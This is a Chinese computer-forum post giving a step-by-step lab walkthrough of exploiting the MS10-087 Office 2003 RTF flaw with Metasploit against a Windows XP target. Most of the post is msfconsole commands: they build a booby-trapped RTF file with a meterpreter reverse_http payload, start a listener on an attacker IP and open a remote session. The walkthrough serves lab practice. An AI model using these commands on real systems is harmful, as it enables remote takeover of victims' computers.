设为首页收藏本站
切换到宽版

电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 MS10_087 office 2003漏洞攻击
返回列表 发新帖

[WEB前端技术] MS10_087 office 2003漏洞攻击

[复制链接]
zhaorong 发表于 2021-5-31 15:37:16 | 显示全部楼层 |阅读模式
office 2003渗透攻击

实验环境

靶机是windows XP 攻击机是kali

实验步骤

靶机IP地址

172248kq14sqgxzz446wnf.png.thumb.jpg

攻击机IP地址

172250iptftipyyihyy6zm.png.thumb.jpg

  1. msf > search ms10_087
复制代码

100.jpg

  1. msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
复制代码

99.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
复制代码

98.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
复制代码

97.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 211.100.66.128
复制代码

96.jpg

show options看一下

19.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > exploit
复制代码

18.jpg

  1. root@bt:~# cp /root/.msf4/local/ms10087.rtf /root/ms10087.rtf
复制代码

16.jpg

12.png

将文档从BT5拷贝到WIN XP靶机上

172256ub3ycnuc3r6yy96y.png.thumb.jpg

  1. msf > use exploit/multi/handler
复制代码

12.jpg

  1. msf  exploit(handler) > set payload windows/meterpreter/reverse_http
  2. payload => windows/meterpreter/reverse_http
复制代码

11.jpg

msf  exploit(handler) >
msf  exploit(handler) > set LHOST 211.100.66.128
LHOST => 211.100.66.128

10.jpg

show options看一下

9.jpg

在靶机双击打开文件

8.png

  1. msf  exploit(handler) > exploit
复制代码

成功连接

8.jpg

  1. meterpreter > ipconfig
复制代码

6.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 10:27

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表